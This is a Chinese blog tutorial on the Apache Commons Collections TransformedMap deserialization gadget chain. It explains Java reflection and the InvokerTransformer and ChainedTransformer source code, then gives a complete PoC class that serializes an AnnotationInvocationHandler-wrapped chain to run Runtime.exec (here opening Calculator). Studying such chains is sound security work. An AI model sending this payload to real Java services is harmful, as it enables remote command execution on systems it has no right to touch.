transform TransformedMap利用链

最新推荐文章于 2024-09-23 12:50:28 发布
最新推荐文章于 2024-09-23 12:50:28 发布
阅读量592 收藏 1
点赞数 1
分类专栏: 安全 文章标签: transform 反射
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/113096002
版权

引入环境:

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>

首先看看通过反射调用命令执行的poc

public static void test01() throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Object runtime=Class.forName("java.lang.Runtime")
                .getMethod("getRuntime",new Class[]{})
                .invoke(null);

        Class.forName("java.lang.Runtime")
                .getMethod("exec", String.class)
                .invoke(runtime,"open /System/Applications/Calculator.app");
    }

这种方式的调用流程如下

1、首选通过类名进行反射

Class<?> cF = Class.forName("com.example.deviceinfodemo.ForNameClass");

2、接着,实例化该类

forNameClass = (ForNameClass) cF.newInstance();

3、最后就是获取非静态方法,并通过invoke调用该方法,invoke参数为实例化对象和目标方法参数

Method aMethod = cF.getMethod("get", String.class);
aMethod.invoke(forNameClass, "str arg");

对于静态方法,则不需要实例化对象:

Class<?> cF = Class.forName("com.example.deviceinfodemo.ForNameClass");
Method staticMethod = cF.getMethod("staticMethod");
staticMethod.invoke("str arg");

InvokerTransformer反射链

先看一下如何使用InvokerTransformer实现反射链

    public static void transformChaim(){
        InvokerTransformer tran = new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", null});
        Method method = (Method) tran.transform(Runtime.class);

        InvokerTransformer tran2 = new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, null});
        Runtime run = (Runtime) tran2.transform(method);

        InvokerTransformer tran3 = new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open /System/Applications/Calculator.app"});
        System.out.println(tran3.transform(run).toString());
    }

来看看InvokerTransformer类为什么能做这些,如下代码所示,首先InvokerTransformer通过构造函数对相应值进行赋值,然后通过transform函数实现反射调用

// InvokerTransformer源码
	public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        this.iMethodName = methodName;
        this.iParamTypes = paramTypes;
        this.iArgs = args;
    }

    public Object transform(Object input) {
        if (input == null) {
            return null;
        } else {
            try {
                Class cls = input.getClass();
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                return method.invoke(input, this.iArgs);
            } catch (NoSuchMethodException var5) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
            } catch (IllegalAccessException var6) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
            } catch (InvocationTargetException var7) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
            }
        }
    }

ChainedTransformer反射链

先上poc:

public static void myChainedTransformer(){
        ChainedTransformer chain = null;
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open /System/Applications/Calculator.app"})};
        chain = new ChainedTransformer(transformers);
        chain.transform(Object.class);
    }

分析一下ChainedTransformer,首先通过构造函数获取数组transformers,然后调用transform函数,该函数会循环获取数组transformers中的值,通过调用transform来实现真正的反射调用。

// ChainedTransformer源码
	public ChainedTransformer(Transformer[] transformers) {
        this.iTransformers = transformers;
    }

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

TransformedMap反射链

前面的代码最后都直接调用了transform函数,来看一个不直接调用的(间接调用),TransformedMap类符合这个条件:

    public static void  myTransformedMap(){
        ChainedTransformer chained = null;
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open /System/Applications/Calculator.app"})};
        chained = new ChainedTransformer(transformers);
        Map m = new HashMap();
        m.put("key", "value"); // 参数不重要,剧情需要
        Map map = TransformedMap.decorate(m,null,chained);
        Map.Entry entry = (Map.Entry) map.entrySet().iterator().next(); // 转换为集合类型,并通过迭代器获取第一组值
        entry.setValue(Object.class); // 参数不重要,剧情需要
    }

来分析一下TransformedMap源码

decorate函数主要起到赋值作用

// TransformedMap源码
    public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        return new TransformedMap(map, keyTransformer, valueTransformer);
    }

    protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        super(map);
        this.keyTransformer = keyTransformer;
        this.valueTransformer = valueTransformer;
    }

跟进setValue函数,发现调用了checkSetValue函数,跟进

        public Object setValue(Object value) {
            value = this.parent.checkSetValue(value);
            return super.entry.setValue(value);
        }

然后就发现了transform函数,继续跟进:

    protected Object checkSetValue(Object value) {
        return this.valueTransformer.transform(value);
    }

然后就跟ChainedTransformer反射链一样了:

    public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

例子🌰

这里举一个使用这个链和java反序列化实现rce的栗子。

如果一个java应用没有对传入的序列化数据进行安全检查,我们可以将恶意的TransformedMap反射链序列化后,远程提交给相关应用,通过某些操作进行触发执行。

在进行反序列化时候,通常会调用ObjectInputStrem类的readObject函数,如果恶意类重写了readObject函数,那么该类进行反序列化时,java会主动调用readObject方法。

因此如果某个可序列化的类重写了readObject方法,并且在readObject中对map类型的变量进行了键值修改操作,并且这个map变量可控,就可以作为我们TransformedMap反射链的攻击载体了。

于是找到了sun.reflect.annotation.AnnotationInvocationHandler类,它的readobject函数如下:

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
        var1.defaultReadObject();
        AnnotationType var2 = null;

        try {
            var2 = AnnotationType.getInstance(this.type);
        } catch (IllegalArgumentException var9) {
            throw new InvalidObjectException("Non-annotation type in annotation serial stream");
        }

        Map var3 = var2.memberTypes();
        Iterator var4 = this.memberValues.entrySet().iterator();

        while(var4.hasNext()) {
            Entry var5 = (Entry)var4.next();
            String var6 = (String)var5.getKey();
            Class var7 = (Class)var3.get(var6);
            if (var7 != null) {
                Object var8 = var5.getValue();
                if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                }
            }
        }

    }

poc如下,该poc需要较老的jdk版本才能用,不用过多实践,这里只是作为一个例子说明:

package classLoaderTest;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.map.HashedMap;
import org.apache.commons.collections.map.TransformedMap;
import org.apache.commons.io.output.ByteArrayOutputStream;


import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.util.Map;

public class CommonCollectionsPlayLoad {

    public static void main(String[] args) throws Exception {
        new CommonCollectionsPlayLoad().run();
    }

    public void run() throws Exception {
        deserialize(serialize(getObject()));
    }

    //在此方法中返回恶意对象
    public Object getObject() throws Exception {
        //构建恶意代码
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open /System/Applications/Calculator.app"})};
        Transformer transformer=new ChainedTransformer(transformers);

        //将恶意代码包装到目标的 sun.reflect.annotation.AnnotationInvocationHandler 中
        /**
         * 构建一个 transformedMap ,
         * transformedMap的作用是包装一个Map对象,使得每一次在该Map中的Entry进行setValue的时候
         * 都会触发 transformer的transform()方法
         * */
        Map transformedMap=TransformedMap.decorate(new HashedMap(),null,transformer);
        //由于AnnotationInvocationHandler无法直接访问,因此使用反射的方式来构建对象
        final Constructor<?> constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
        constructor.setAccessible(true);
        return constructor.newInstance(Override.class, transformedMap);
    }

    public byte[] serialize(final Object obj) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        return out.toByteArray();
    }

    public Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
        ByteArrayInputStream in = new ByteArrayInputStream(serialized);
        ObjectInputStream objIn = new ObjectInputStream(in);
        return objIn.readObject();
    }
}

参考:
https://www.freebuf.com/vuls/170344.html

5wimming
关注
专栏目录
CommonsCollections1利用分析
m0_61506558的博客
11-14 427
总结以图解的方式回顾一下整条利用:第一条:从开始;调用 TransformedMap类从其父类继承回来的setValue()方法;然后调用了自身的方法;该方法调用传入的Transformer类的方法;
Java安全(七) CC1
WDWAGAAFGAGDADSA的博客
12-24 2388
Commons Collections 1的基本知识
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3666
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
Apache commons-collections反序列化漏洞(TransformedMap利用)
qq_43936524的博客
04-10 584
文章目录Commons-collections概述InvokerTransformer反射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
Java反序列化CC1-TransformedMap学习
最新发布
ULGANOY的博客
09-23 1094
java反序列化CC1的简单学习记录
[Java安全]CommonCollections1_TransformedMap
cosmoslin的博客
03-08 687
CommonCollections1_TransformedMap 本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 3.1 import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.Const
java 反序列化CC1分析(TransformedMap)
wsitcj的博客
03-14 1505
Map类 --> TransformedMap Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。 TransformedMap.decorate方法
Transformation的map使用
weixin_39868387的博客
07-03 751
上篇:Sink-StreamingFileSink的使用 需求实现:在nc -lk 8888窗口下执行输入数据,把输入的单词转为大写在控制台输出 具体代码: package cn._51doit.flink.day02; import org.apache.flink.api.common.functions.MapFunction; import org.apache.flink.configuration.Configuration; import org.apache.flink.stream
JAVA反序列化之CommonCollections1利用
lt_xiaodou的博客
08-30 373
看到这里,是否有一种豁然开朗的感觉?到这里相信大家对上面的Demo原理已经了解了,但是现在有一个问题,我们在本机执行是可以执行代码了,但是怎么反序列化漏洞中来利用这个利用呢?通过上面的调用总结可以看出,这一套调用主要是围绕着Transformer接口的transform方法的,所以说要找到一个在readObject方法中能调用transform方法的地方。整篇文章总体思路是跟着P牛的文章思路来的,只不过因为基础薄弱很多地方都详细分析了一遍。...
cc1 transform
lylong0703的博客
02-12 3378
cc1 transform 一步一步寻找利用1.找到利用终点2.寻找transform3.进入TransformedMap3.寻找setValue一些小问题 上个大图 成功反序列化 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 poc package org.example.cc.cc1; import org.apache.commons.collections.Tra
java反序列化 - transformedMap类可以执行恶意代码的原理
weixin_34319111的博客
08-16 822
java反序列化 - transformedMap类可以执行恶意代码的原理 0x00 代码 Map map=new HashMap(); map.put("key","value"); //调用目标对象的toString方法 String command="calc.exe"; final String[] execArgs ...
Java代码审计——Commons Collections TransformedMap调用
王嘟嘟的博客
11-05 931
0x00 前言 CC最基础的就是迭代:Java代码审计——Commons Collections 迭代调用,核心就是 ChainedTransformerTransformer方法。那么TransformedMap就是可以调用此方法的一条。 0x01 TransformedMap调用 在CC包中, 有TransformedMap这样一个类,他在进行put,checkSetValue等方法时,可以触发transform方法,如下图所示。 1. 先上poc: Transformer[] trans
Java 反序列化漏洞-Apache Commons Collections1-TransformedMap 攻击
cjdgg的博客
02-08 2521
Java 反序列化漏洞-Apache Commons Collections前言前置知识TransformedMap 前言 前面已经学了一些Java反序列化漏洞的相关基础知识,今天就来学习分析一下Apache Commons Collections的反序列化漏洞 环境搭建推荐大家直接使用maven搭建,网上都有很多教程这里就不多说了 要寻找反序列化漏洞,最主要的是找到三个点: 入口点(kick-off),触发点(sink),调用(chain) 前置知识 TransformedMap org.apache.
java 序列化 反射_JAVA反序列化中的反射
weixin_42492000的博客
02-16 330
反射的构造看JAVA反序列化http://www.freebuf.com/news/150872.html构造反射Transformer类,源码解释为从一个类转化为另一个类。其中的transform()为执行转换方法。ConstantTransformer,invokerTransformer,ChainedTransformerTransformedMap继承了Transformer类...
CC1(TransformMap版)
..
10-09 1197
借用闪烁之狐的介绍是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Commons由三部分组成:Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。包为Java标准的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。
.exp文件_UEditor编辑器任意文件上传漏洞分析
weixin_39939510的博客
11-27 264
更多全球网络安全资讯尽在邑安全ue下载地址http://http://ueditor.baidu.com/website/download.htmlexp<form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" m...
Java反序列化之CC1
一剑开天门!的博客
03-02 517
Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类。作为Apache开源项⽬的重要组件,Commons Collections被⼴泛应⽤于各种Java应⽤的开发,⽽正 是因为在⼤量web应⽤程序中这些类的实现以及⽅法的调⽤,导致了反序列化⽤漏洞的普遍性和严重性
java安全(八)TransformedMap构造POC
weixin_45694388的博客
07-31 1200
上一篇构造了一个了commons-collections的demo package test.org.vulhub.Ser; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; impo
CSS 利用transform达到居中效果
05-30
可以使用如下代码实现水平垂直居中效果: ```css .parent { position: relative; } .child { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); } ``` 其中,`top: 50%;` 和 `left: 50%;` 将子元素的左上角移动到父元素的中心位置,而 `transform: translate(-50%, -50%);` 则将子元素自身的中心位置移动回来,从而实现居中效果。需要注意的是,父元素需要设置为相对定位(`position: relative;`),否则子元素的居中位置将相对于整个页面而非父元素。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值